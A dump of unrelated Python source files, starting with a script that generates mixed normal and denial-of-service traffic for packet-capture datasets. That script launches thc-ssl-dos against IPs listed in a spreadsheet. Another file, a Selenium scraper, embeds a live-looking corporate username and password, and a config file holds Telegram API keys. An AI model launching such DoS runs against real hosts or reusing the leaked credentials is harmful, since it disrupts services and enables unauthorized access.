8463f1d6308fa2292d9dfa2ea550c1529e9d3cd5 | 1c3c155f39573ca9b382bc2520dde359cc6f8fe6 | /mix_traffic.py | 0480d3f061e9e726c1ed9516f74c19b851135496 | [] | no_license | zxyap/mix_traffic_collection | 885a60a3f30783d05124e26eb7ddc97fc6ecbf5d | 14f34dec56226ca2ed1ac6c29cb5f155cb9420e1 | refs/heads/master | 2022-12-11T10:02:19.215427 | 2019-10-03T13:35:04 | 2019-10-03T13:35:04 | 211,783,201 | 0 | 0 | null | 2022-12-08T06:39:30 | 2019-09-30T05:38:15 | Python | UTF-8 | Python | false | false | 14,711 | py | import os
from selenium import webdriver
import subprocess
import datetime
import logging
import socket
import random
from fake_useragent import UserAgent
import time
from urllib.request import Request, urlopen
import urllib.error
import argparse
from bs4 import BeautifulSoup
import sys
from selenium.common.exceptions import InvalidArgumentException
import pandas as pd
import numpy as np
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import InvalidSessionIdException
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import SessionNotCreatedException
from selenium.common.exceptions import WebDriverException
import http.client
import ssl
import psutil
import requests
from requests import HTTPError
from requests import Timeout
from requests import RequestException
import threading
#global variable
isAttacking = 1;
isNormal = 0;
excel_dir = "./report_unique_normal.xlsx"
excel_dir_dos = "./report_unique_dos.xlsx"
print("Reading from excel file now for the list of sites to test...")
df = pd.read_excel(excel_dir, sheet_name="complete_list")
df_dos = pd.read_excel(excel_dir_dos, sheet_name="thc-tls-dos")
dictionary = {}
dictionary_dos = {}
ip_list_normal = df['IP']
ip_list_dos = df_dos['IP']
ua = UserAgent()
length = 0
def clean_domain(url):
if "https://" in url:
result = url[8:]
elif "http://" in url:
result = url[7:]
else:
result = url
if "/" in result:
result = result.split("/")[0]
return result
def normal(ip):
# Finding the chromedriver path to start selenium web driver
# Getting the abs path of chromedriver for selenium automation
cdPath = "chromedriver"
chromeDriverPath = os.path.abspath(cdPath)
while isAttacking == 1:
options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')
options.add_argument('--ignore-certificate-errors-spki-list')
options.add_argument('--ignore-ssl-errors')
options.add_argument('--no-sandbox')
options.add_argument('--headless')
options.add_argument('--disable-dev-shm-usage')
try:
driver = webdriver.Chrome(chromeDriverPath, options=options)
except SessionNotCreatedException as snce:
logging.exception(str(snce) + " session failed to create")
pass
# Setting a timeout for the page load to hasten the process
driver.set_page_load_timeout(time_to_wait=30)
# Getting domain
domain = dictionary[ip]
print("testing " + domain)
# Check if website has http
if domain[0:7] != "http://":
# appending https:// for urllib
domain_urllib = "https://" + domain
else:
domain_urllib = domain
print(domain_urllib)
headers = {'User-Agent': ua.random}
req = Request(
domain_urllib,
headers={'User-Agent': ua.random}
)
# Trying to open the URL to scrape HTML
try:
resp = urlopen(req).read()
except urllib.error.HTTPError as httpe:
logging.error(str(httpe) + " for " + domain_urllib)
continue
except urllib.error.URLError as urle:
logging.error(str(urle) + " for " + domain_urllib)
continue
except TimeoutError as toe:
logging.error(str(toe) + " for " + domain_urllib)
continue
except http.client.HTTPException as httpexcep:
logging.error(str(httpexcep) + " for " + domain_urllib)
continue
except ssl.CertificateError as sslCE:
logging.error(str(sslCE) + " for " + domain_urllib)
continue
except ConnectionResetError as cre:
logging.error(str(cre) + " for " + domain_urllib)
continue
except UnicodeEncodeError as uee:
logging.error(str(uee) + " for " + domain_urllib)
continue
except ValueError as ve:
logging.error(str(ve) + " for " + domain_urllib)
continue
soup = BeautifulSoup(resp, "html.parser")
cleanLinks = []
for link in soup.find_all('a', href=True):
if "javascript" not in link or "#" not in link:
cleanLinks.append(link["href"])
try:
driver.get(domain_urllib)
except TimeoutException as toe:
print("Timeout, moving onto next site")
logging.exception(str(toe) + " for " + domain_urllib)
pass
except InvalidSessionIdException as isie:
print("Invalid session id, moving on to the next site")
logging.exception(str(isie) + " for " + domain_urllib)
pass
# This polls for the return code of the tshark process, once 200 packets have been captured, expected return : 0
count = 0
timeout = 50
#set flag = 1 once the normal traffic has started
global isNormal
isNormal = 1
while 1 and isAttacking == 1 :
count = 1 #make counter a non factor
return_code = sts.poll()
if return_code == 0 or count >= timeout:
if return_code == 0:
print("tshark has terminated gracefully")
logging.info("tshark has terminated gracefully")
elif count >= timeout:
print("timeout has been reached")
logging.info("timeout has been reached")
for proc in psutil.process_iter():
# check whether the process name matches
if proc.pid == sts.pid:
try:
proc.kill()
except psutil.NoSuchProcess as nsp:
logging.error(str(nsp))
finally:
break
else:
continue
break
else:
if len(cleanLinks) > 1:
link = random.choice(cleanLinks)
ip_socket = []
if "http" not in link and ".com" not in link:
seleniumLink = "https://" + domain + link
socketLink = domain
else:
seleniumLink = link
socketLink = clean_domain(link)
try:
socket_info = socket.getaddrinfo(socketLink, None)
except socket.gaierror as e:
logging.error(str(e) + " error for " + str(socketLink))
continue
except UnicodeError as e:
logging.error(str(e) + " error for " + str(socketLink))
continue
for info in socket_info:
ip_socket.append(info[4][0])
for ip_test in ip_socket:
# Introducing sleep between 3 to 8 seconds to allow simulation of user behaviour
#time.sleep(np.random.randint(low=3, high=8))
if ip_test == ip:
try:
driver.get(seleniumLink)
logging.info("Successfully accessed website " + str(seleniumLink))
except InvalidArgumentException as iae:
logging.info(str(iae) + "Invalid Argument Exception " + str(seleniumLink))
continue
except TimeoutException as te:
logging.info(str(te) + "Time Out Exception " + str(seleniumLink))
continue
except UnexpectedAlertPresentException as uape:
logging.exception(str(uape) + " unexpected alert present!")
driver.switch_to.alert.accept()
continue
except WebDriverException as wde:
logging.exception(str(wde) + " webdriver exception!")
continue
finally:
break
else:
print("Sending GET requests!")
logging.info("Sending GET requests to " + ip + " " + domain)
try:
requests.get("http://" + ip, headers={'User-Agent': ua.random}, timeout=5)
except ConnectionError as ce:
logging.error(str(ce))
except HTTPError as httperr:
logging.error(str(httperr))
except Timeout as toe:
logging.error(str(toe))
except RequestException as re:
logging.exception(str(re))
finally:
break
else:
pass
count = 0
# Kill chrome processes to clear memory to avoid virtual memory problem
parent = psutil.Process(driver.service.process.pid)
chromeProcesses = (parent.children(recursive=True))
if chromeProcesses != "":
for process in chromeProcesses:
p = psutil.Process(process.pid)
p.kill()
try:
driver.quit()
except TimeoutException as toe:
logging.exception(str(toe) + " Driver failed to close")
except UnexpectedAlertPresentException as uape:
logging.exception(str(uape) + " unexpected alert present!")
driver.switch_to.alert.accept()
driver.close()
finally:
driver.quit()
# Terminate selenium
try:
driver.quit()
except NameError as NE:
logging.error(str(NE))
driver.close()
def attack(ip):
count = 0
while isNormal == 0 :
time.sleep(1)
count = count + 1
if count == 60 :
global isAttacking
isAttacking = 0
return
print('ready to attack at ' + str(ip))
# Initializer for thc-ssl-dos
# Declaring variables for thc-ssl-dos
parallel_connections = 1
port = 443
logging.info("DDOSING at " + ip)
thc_command = "thc-ssl-dos -l " + str(parallel_connections) + " " + ip + " " + str(port) + " " + "--accept"
GNULL = open(os.devnull, 'w')
thc_process = subprocess.Popen(thc_command, shell=True, stdout=GNULL)
logging.info("Opened DOS attack at " + ip)
# Sleeping for 25 seconds before killing them off
time.sleep(60)
kill_thc = "killall -s SIGTERM thc-ssl-dos"
kill_sniff = "killall -s SIGTERM tshark"
os.system(kill_thc)
os.system(kill_sniff)
isAttacking = 0;
print('THE ATTACK HAS STOPPED. Exiting the attack thread..')
logging.info("DDOS finished for " + ip)
if __name__ == '__main__' :
# Initializing the dictionary to be able to retrieve the names easily
# Different IP (Key) lead to same Domain (Value)
for index, row in df.iterrows():
domain = row['Domain']
ip = row['IP']
dictionary[ip] = domain
for index, row in df_dos.iterrows():
domain = row['Domain']
ip = row['IP']
dictionary_dos[ip] = domain
if(len(dictionary) < len(dictionary_dos)):
length = len(dictionary)
else:
length = len(dictionary_dos)
logging.basicConfig(filename='mixed_traffic.log', level=logging.INFO, format='%(asctime)s-%(levelname)s-%(message)s')
location = "/media/sf_Shared2/mixed/"
#location = "output/"
file_path = os.path.join(location + "mixed_traffic/" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
if not os.path.exists(file_path):
os.makedirs(file_path)
####################for single testing########################################
#ip_normal = ip_list_normal[0]
#ip_dos = ip_list_dos[0]
#isAttacking = 1
#isNormal = 0
# SNIFFER
# Declaring variables for the sniffer
# Capture filter ip_list[0] is taken as the first IP resolved to capture
# Might not be too perfect in the case
#abspath = os.path.abspath(file_path)
#interface = "eth0"
#capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
#filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
# Raw capturing
#command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
#command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
#sts = subprocess.Popen(command, shell=False)
#time.sleep(5)
#normal_t = threading.Thread(target=normal, args=(ip_normal,))
#normal_t.start()
#attack_t = threading.Thread(target=attack, args=(ip_dos,))
#attack_t.start()
##############################################################################
for i in range(814, length):
ip_dos = ip_list_dos[i]
ip_normal = ip_list_normal[i]
print("normal at " + ip_normal)
print("ddos at " + ip_dos)
isAttacking = 1
isNormal = 0
# SNIFFER
# Declaring variables for the sniffer
# Capture filter ip_list[0] is taken as the first IP resolved to capture
# Might not be too perfect in the case
abspath = os.path.abspath(file_path)
interface = "eth0"
capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
# Raw capturing
#command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
sts = subprocess.Popen(command, shell=False)
time.sleep(5)
normal_t = threading.Thread(target=normal, args=(ip_normal,))
normal_t.start()
attack_t = threading.Thread(target=attack, args=(ip_dos,))
attack_t.start()
while isAttacking == 1 :
time.sleep(2)
print('attack has stopped..')
normal_t.join()
attack_t.join()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
037c36b38eb376e91ce6c2b3bb5d768258458fdd | 343622a56b72a72ac016d3855a1c16c1c4fc8bc1 | /first_rest_api/03_flask/item.py | d40ca2746ad1c87ec06d18e9131cfb030b490548 | [] | no_license | copetty/test-repository | c74dde301fc3a102cc953042a51d8a7db669caf6 | be9daa5aa416a699a3bb84a1fed11ba3449d194a | refs/heads/master | 2023-05-07T13:07:31.238903 | 2021-05-24T00:02:51 | 2021-05-24T00:02:51 | 370,181,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,215 | py | from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
import sqlite3
class Item(Resource):
parser = reqparse.RequestParser()
parser.add_argument(
'price',
type=float,
required = True,
help="This feild cannot be left blank!")
@jwt_required()
def get(self, name):
item = self.find_by_name(name)
if item:
return item
return {'message': 'Item not found'}, 404
@classmethod
def find_by_name(cls, name):
connection = sqlite3.connect('data.db')
cursor = connection.cursor()
query = "SELECT * FROM items WHERE name=?"
result = cursor.execute(query, (name,))
row = result.fetchone()
connection.close()
if row:
return {'item': {'name': row[0], 'price': row[1]}}
def post(self, name):
if self.find_by_name(name):
return {'message': "An item with the name '{}' already exists.".format(name)}, 400
data = Item.parser.parse_args()
item = {'name': name, 'price': data['price']}
try:
self.insert(item)
except:
return {"message": "An error occurred inserting the item."}, 500# internal server error
return item, 201
@classmethod
def insert(cls, item):
connection = sqlite3.connect('data.db')
cursor = connection.cursor()
query = "INSERT INTO items VALUES (?, ?)"
cursor.execute(query, (item['name'], item['price']))
connection.commit()
connection.close()
def delete(self, name):
connection = sqlite3.connect('data.db')
cursor = connection.cursor()
query = "DELETE FROM items WHERE name=?"
cursor.execute(query, (name,))
connection.commit()
connection.close()
return {'message': 'item deleted'}
def put(self, name):
data = Item.parser.parse_args()
item = self.find_by_name(name)
updated_item = {'name': name, 'price': data['price']}
if item is None:
try:
self.insert(updated_item)
except:
return {'message' : 'An error occured inserting the item.'}, 500
else:
try:
self.update(updated_item)
except:
return {'messge': 'An error ocurred updating the item.'}, 500
item.update(updated_item)
return updated_item
@classmethod
def update(cls, item):
connection = sqlite3.connect('data.db')
cursor = connection.cursor()
query = "UPDATE items SET price=? WHERE name=?"
cursor.execute(query, (item['price'], item['name']))
connection.commit()
connection.close()
class ItemList(Resource):
def get(self):
connection = sqlite3.connect('data.db')
cursor = connection.cursor()
query = "SELECT * FROM items"
result = cursor.execute(query)
items = []
for row in result:
items.append({'name': row[0], 'price': row[1]})
connection.close()
return {'items': items}
| [
"copetty96@gmail.com"
] | copetty96@gmail.com |
9c49f34c4e0af8d51ca97a03a373e5fc2d76440a | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/toolbox/middleware_20191129081531.py | bed0186b917d604de34c93cc7df6e8c7ddb4bfb8 | [] | no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,601 | py | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from datetime import datetime
import toolbox.sheets as sheet
import pandas as pd
def middleware():
driver = webdriver.Chrome(executable_path='chromedriver.exe')
driver.get("https://wsmid-prd.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
dominio = 'whirlpool'
usuario = 'daniel_coelho'
senha = 'Sua95xb4'
bra = "BRA"
data = '2019-11-01'
query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integração] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integração] DESC".format(data,bra)
campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
campo_dominio.send_keys(dominio)
campo_usuario =driver.find_element_by_id("ucLogin1_txtUser")
campo_usuario.send_keys(usuario)
campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
campo_senha.send_keys(senha)
campo_senha.send_keys(Keys.RETURN)
records = driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
records.send_keys('sem limites')
text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
text_query.send_keys(query)
executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
arr = []
resposta = driver.find_elements_by_tag_name('tr')
for item in range(len(resposta)):
linha = resposta[item].text
arr.append(linha.split())
coluna = arr[3]
coluna1 = coluna.pop(3)
coluna1 = coluna1 +" "+ coluna.pop(3)
coluna1 = coluna1 +" "+ coluna.pop(3)
coluna.append(coluna1)
df = pd.DataFrame(data=arr[4:], columns=coluna)
# df = df.insert(0,'timeStamp')
now = datetime.now()
df['timeStamp'] = ''
df1 = df.drop(columns='#')
wb = pd.ExcelFile('base_middleware.xlsx')
base_m = pd.read_excel(wb)
print(base_m.head())
print(df1.head())
sheet.insertPlanMiddleware(df1)
base_m['timeStamp'] = datetime.now().strftime('%m/%S/%Y %H:%M:%S')
print(df1)
df1.append(base_m)
print(base_m)
nomeArquivo = 'base_middleware.xlsx'
df1.to_excel(nomeArquivo, index=False)
sair = driver.find_element_by_id("ctl00_lgStatus").click()
driver.close()
# clienteEstado warehouseId Pendentes de integração Última hora? | [
"oseiasbeu@outlook.com"
] | oseiasbeu@outlook.com |
0240279d614cdfa43d1feb765b1158095b2c2b3e | 4ce40248e08e753ec1916297cb2f803bc5066e0c | /utils/downloadFTP.py | 5969c007b28c54410073d1429976dc3bfa0a4493 | [] | no_license | adpolicarpo/SCRAG | db0d0078b815d5567a860bb64788dd326754195a | db5e23cf5408cccc8dab5239f068cb743c71e37b | refs/heads/master | 2020-06-01T06:53:00.046642 | 2015-09-03T16:32:25 | 2015-09-03T16:32:25 | 40,362,038 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,862 | py | #########################################################
##### Script to download genomes from GenBank FTP #####
##### Author: Adriana Policarpo #####
#########################################################
from ftplib import FTP
import os
ftp = FTP('ftp.ncbi.nih.gov') # connect to host
ftp.login()
ftp.cwd('genomes/Bacteria/') # set directory
l = ftp.nlst() # retrieves a list of file names
print 'Matching Streptococcus_pneumoniae...'
print 'Select the extension of the files you wish to download'
print 'e.g. .gff, .tab, .val, .asn, .fna...'
resp = raw_input()
#############
# function that returns the name of the files with the choosen extention,
# in the given directory
def files (name, ext):
ftp.cwd(name) # set directory
fil = ftp.nlst() # retrieves a list of file names
for f in fil:
if ext in f:
return f
############
# replace 'Streptococcus_pneumoniae' with the name of species wanted, written as in GenBank FTP
for item in l:
if 'Streptococcus_pneumoniae' in item:
try:
filename = files (item, resp)
filename2 = item + '_' + filename
print filename2
directory = './'+item #define directory to save the files
if not os.path.exists(directory):
os.mkdir(directory) #make new directory, if it not exists
os.chdir(directory) #change directory
file = open(filename2, 'wb') #open a file
ftp.retrbinary('RETR ' + filename, file.write) #download file
file.close() #close the file
ftp.cwd('..') # returns to the last directory
os.chdir('..')
except:
print 'no files with this extention'
ftp.close() # Close the connection
| [
"adri_poli@hotmail.com"
] | adri_poli@hotmail.com |
d643ffc82c8f5d1f4332b0ca587f905ec10b6b0c | 689114d6466fdba8da2b20beabe56320b97410f3 | /assignment2/cs231n/classifiers/cnn.py | 49f244cfaef3841bff5e8a45a00c5beae622a083 | [] | no_license | jaja7/cs231n_assignment_winter1516 | 87b39a2e6c93ad5d309836b261de1033daf94eef | 8a807e837e956ffeec2944bd043160d51073c587 | refs/heads/master | 2021-01-20T08:31:18.485716 | 2017-05-03T16:12:53 | 2017-05-03T16:12:53 | 90,159,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,649 | py | import numpy as np
from cs231n.layers import *
from cs231n.fast_layers import *
from cs231n.layer_utils import *
class ThreeLayerConvNet(object):
"""
A three-layer convolutional network with the following architecture:
conv - relu - 2x2 max pool - affine - relu - affine - softmax
"""
def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7,
hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,
dtype=np.float32):
self.params = {}
self.reg = reg
self.dtype = dtype
# Initialize weights and biases
C, H, W = input_dim
self.params['W1'] = weight_scale * np.random.randn(num_filters, C, filter_size, filter_size)
self.params['b1'] = np.zeros(num_filters)
self.params['W2'] = weight_scale * np.random.randn(num_filters*H*W/4, hidden_dim)
self.params['b2'] = np.zeros(hidden_dim)
self.params['W3'] = weight_scale * np.random.randn(hidden_dim, num_classes)
self.params['b3'] = np.zeros(num_classes)
for k, v in self.params.iteritems():
self.params[k] = v.astype(dtype)
def loss(self, X, y=None):
W1, b1 = self.params['W1'], self.params['b1']
W2, b2 = self.params['W2'], self.params['b2']
W3, b3 = self.params['W3'], self.params['b3']
# pass conv_param to the forward pass for the convolutional layer
filter_size = W1.shape[2]
conv_param = {'stride': 1, 'pad': (filter_size - 1) / 2}
# pass pool_param to the forward pass for the max-pooling layer
pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}
# compute the forward pass
a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param)
a2, cache2 = affine_relu_forward(a1, W2, b2)
scores, cache3 = affine_forward(a2, W3, b3)
if y is None:
return scores
# compute the backward pass
data_loss, dscores = softmax_loss(scores, y)
da2, dW3, db3 = affine_backward(dscores, cache3)
da1, dW2, db2 = affine_relu_backward(da2, cache2)
dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
# Add regularization
dW1 += self.reg * W1
dW2 += self.reg * W2
dW3 += self.reg * W3
reg_loss = 0.5 * self.reg * sum(np.sum(W * W) for W in [W1, W2, W3])
loss = data_loss + reg_loss
grads = {'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2, 'W3': dW3, 'b3': db3}
#for k, v in grads.items():
#print k
return loss, grads
pass
| [
"wangjiajia123@gmail.com"
] | wangjiajia123@gmail.com |
de26330ae9f9fa29b1fab8740fe3cd8dc6ec643a | 6291f0d789d9d6ec2f117eefa5d29ec234c9015e | /get_lyric/__init__.py | a428eddef5633a970b30688bd84fcc0e0f73a1cc | [] | no_license | atcdot/get_lyric | 25c4cfb7eb4d7e1c8e3622446e94c2b6f63ca931 | 7f0ef53a5ec75be71dc1446fb72f6476b69aa85c | refs/heads/master | 2021-09-06T10:12:45.351560 | 2018-02-05T10:42:39 | 2018-02-05T10:42:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | '''
Created on 2015/06/07
@author: yoshi
'''
__all__ = ['common','sites']
| [
"tripod31@hotmail.com"
] | tripod31@hotmail.com |
43d3606680c7c08b541d8e66a106bbe7f13c0fa7 | 2923b9f58e6a143a3e070169612165585c301def | /LA/gp_rupture_test/LA/gp_rupture_test/gp_021219_Scott_7.35_noplas_2hz/fault_full_loc.py | d3f385c3d1a7f68a7593b81008a1ecdc93ae3228 | [] | no_license | hzfmer/summit_work_021421 | 16536dd716519bc9244da60007b9061ef5403429 | 6981b359fefb2af22e0bea6c47511de16cad22bd | refs/heads/master | 2023-03-11T15:34:36.418971 | 2021-02-05T23:22:10 | 2021-02-05T23:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,451 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 2018
@author: Zhifeng Hu <zhh076@ucsd.edu>
"""
import numpy as np
from numpy import sin, cos, pi, sqrt
import os
import sys
import glob
import time
nt_ref = 2000
nt_des = 10 * nt_ref
theta_rot = 35
f = open(glob.glob('./*.srf')[0],'r')
f.readline()
f.readline()
token = f.readline()
nx = int(token.split()[2])
nz = int(token.split()[3])
f.close()
if not os.path.isfile('fault_full_loc.txt'):
fault_loc = np.array(np.loadtxt("fault_loc.idx"))
x1 = int(fault_loc[0,0])
x2 = int(fault_loc[1,0])
y1 = int(fault_loc[0,1])
y2 = int(fault_loc[1,1])
x_tmp = np.linspace(x1, x2, np.abs(x2 - x1) + 1)
y_tmp = [np.float((y2-y1)/(x2-x1))*(x-x1) + y1 for x in x_tmp]
f_interp=interp1d(x_tmp, y_tmp, fill_value='extrapolate')
if x1 < x2:
new_x = np.arange(x1, x1 + nx * 2 )
new_y = [np.int(i) for i in f_interp(new_x)]
else:
new_x = np.arange(x1 + 1 - nx * 2, x1 + 1)
new_y = [np.int(i) for i in f_interp(new_x)]
new_x = new_x[::-1]
new_y = new_y[::-1]
mx = 6320
my = 4200
ll = np.fromfile('../scripts/surf.grid', dtype='float64', count=2 * my * mx).reshape(my, mx, 2)
ll_fault = [np.float32((ll[new_y[i], new_x[i], 0], ll[new_y[i], new_x[i], 1])) for i in range(len(new_x))]
np.savetxt('fault_full_loc.txt', ll, fmt='%f')
# np.array(ll_fault).tofile('latlon_fault.bin')
| [
"hzfmer94@gmail.com"
] | hzfmer94@gmail.com |
1773f9b8b03adcd61ad6b4dce8b09156adfd7af0 | ef0ac2e679f6f059658aa3732cc706fe4c5d5cbf | /brain_invader/concat_all_result.py | 396015f567c0e4f6959b9679a20b16b2aee63579 | [] | no_license | nbuton/PLDAC | f4e51d43fd6166716768e0226a64ce5a55c98241 | 662d5d6155a4ba15b67f2b5cfd2c2792365c9a02 | refs/heads/master | 2022-01-05T04:05:01.488608 | 2019-05-27T16:50:26 | 2019-05-27T16:50:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,706 | py | import os
import csv
def getListOfFiles(dirName):
# create a list of file and sub directories
# names in the given directory
listOfFile = os.listdir(dirName)
allFiles = list()
# Iterate over all the entries
for entry in listOfFile:
# Create full path
fullPath = os.path.join(dirName, entry)
# If entry is a directory then get the list of files in this directory
if os.path.isdir(fullPath):
allFiles = allFiles + getListOfFiles(fullPath)
else:
allFiles.append(fullPath)
return allFiles
def keep_only_result_file(fileList):
new_fileList=[]
for f in fileList:
if("resultat" in f):
new_fileList.append(f)
return new_fileList
def filter_file(filtre,fileList):
new_fileList=[]
for f in fileList:
if(filtre in f):
new_fileList.append(f)
return new_fileList
def saveResult(name,result):
myfile = open(name, 'w')
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow(["nom du fichier","1 seconde","0.1 seconde","0.04 seconde"])
for r in result:
wr.writerow(r)
testName = "test_par_groupe_12"
fileList = getListOfFiles("resultats/"+testName+"/")
fileList = keep_only_result_file(fileList)
print(len(fileList))
list_finale=[]
for f in fileList:
print(f)
tmp=[f]
with open(f) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
row_count = 0
for row in csv_reader:
if(row_count != 0):
tmp.append(row[1])
row_count+=1
list_finale.append(tmp)
print(len(list_finale))
saveResult("resultats/"+testName+"/concat_file.csv",list_finale)
| [
"holophore@holophore.home"
] | holophore@holophore.home |
760f2a534ec5161bec67df526d1c6f2f94bd9a02 | e590f1892d08c18cb2e5233c830934592be90b53 | /config.py | e08deb19e8b3bc57a6f1fcf45ff0cfaecf5d0bb8 | [] | no_license | demtodeath/TGSPAMMER | cc38558ebadb2c5cc719b7bf0a879ce065ddc2bc | 0e10b0ec78b7c934507f93daf4526bd9197f442e | refs/heads/main | 2023-06-05T18:22:01.492992 | 2021-06-22T19:05:20 | 2021-06-22T19:05:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py |
#BOT:
TOKEN = "" # ТОКЕН БОТА
ADMIN = 392192947 # ИД АДМИНА, узнать свой айди - @get_any_telegram_id_bot
DIR = "" # Путь к файлу, если нужно
#USER: # https://my.telegram.org/auth
API_ID = 6623613
API_HASH = "3504ada74bdd34a2e5bf510e1bfd6460" | [
"noreply@github.com"
] | demtodeath.noreply@github.com |
3a2aace405551240c749077517533bdee9b234de | e562f7e0a51273475e50a7e61d1d377f88775622 | /flags.py | 39c29607dfbc5649d50a4d7b0c0d48d7e2e0df9b | [] | no_license | bloodcurdle/ReadableWebProxy | d1c6ae0220fdb04ea7ab82963c86e776a0dbbfd9 | 10f68f913a78f8b0e47582996d9860a61da55dd6 | refs/heads/master | 2021-05-29T19:58:32.965610 | 2015-11-09T18:25:00 | 2015-11-09T18:25:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py |
RUNSTATE = True
FEEDER_STARTED = False
RSS_DEBUG = False
RULE_CACHE = None
SPECIAL_CASE_CACHE = None | [
"something@fake-url.com"
] | something@fake-url.com |
60226e9a1da94d8a374b9fb6ff9f4b35b54917ef | c08cbc3589f2542ee2718ba900dec682e80cbd48 | /authentication_practice_part_2/models.py | a3c1e6015bd6103dd34cfd688dcba1f531316dd3 | [] | no_license | pun1sh3r/flask_lab | 4abf1f1d4d1ada4de556e87e70861c3f5902c677 | 0e2fb2c9ed46d22a3a36584b36adb37d3c2ebfc0 | refs/heads/master | 2023-09-04T01:49:06.795779 | 2021-11-08T21:41:52 | 2021-11-08T21:41:52 | 421,600,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | from app import db
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin, LoginManager, login_required, login_user, current_user
from werkzeug.security import generate_password_hash,check_password_hash
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password = db.Column(db.String(128))
def __repr__(self):
return '<User {}>'.format(self.username) | [
"lmendieta@fidelissecurity.com"
] | lmendieta@fidelissecurity.com |
cee79224828046ad207e51d9a47d49cf7fe50c1f | 21ebe23f27cced0b5f9fa01a350268eb19cf26bf | /run_radon_varying_intercept.py | 0e70ec6281244a497b924637b276188a01784289 | [] | no_license | joseffaghihi/pymc_radon | dfe7879dd03e56d756a4db96d4248e07c08c5240 | aeeb71f4c50f22b90bc2659e8f5841e2070c3c54 | refs/heads/master | 2021-01-15T09:24:24.291545 | 2011-03-08T18:19:19 | 2011-03-08T18:19:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import pymc
import radon_varying_intercept
from pylab import hist, show
from pymc import Matplot
M = pymc.MCMC(radon_varying_intercept)
M.sample(iter=50e3, burn=10e3, thin=5)
fit = M.stats()
for k in fit.keys():
print(k,fit[k]['mean'])
Matplot.plot(M)
| [
"armstrong.whit@gmail.com"
] | armstrong.whit@gmail.com |
c553f3cf8e814068e3de80a5d5d74670c9a32497 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_212/62.py | 2e921c86f22c4e6edb1a0681c1da5040d943a43a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | import sys
import itertools
sys.setrecursionlimit(10000000)
tc = int(sys.stdin.readline().strip())
for tmp_tc in xrange(tc):
[ N, P ] = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
gs = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
cnts = [ 0 ] * P
for g in gs:
cnts[g % P] += 1
cache = {}
def dp(cfg, p):
if sum(cfg) == 0: return 0
key = tuple(cfg), p
if key in cache: return cache[key]
res = None
for idx, k in enumerate(cfg):
if k == 0: continue
cfg[idx] -= 1
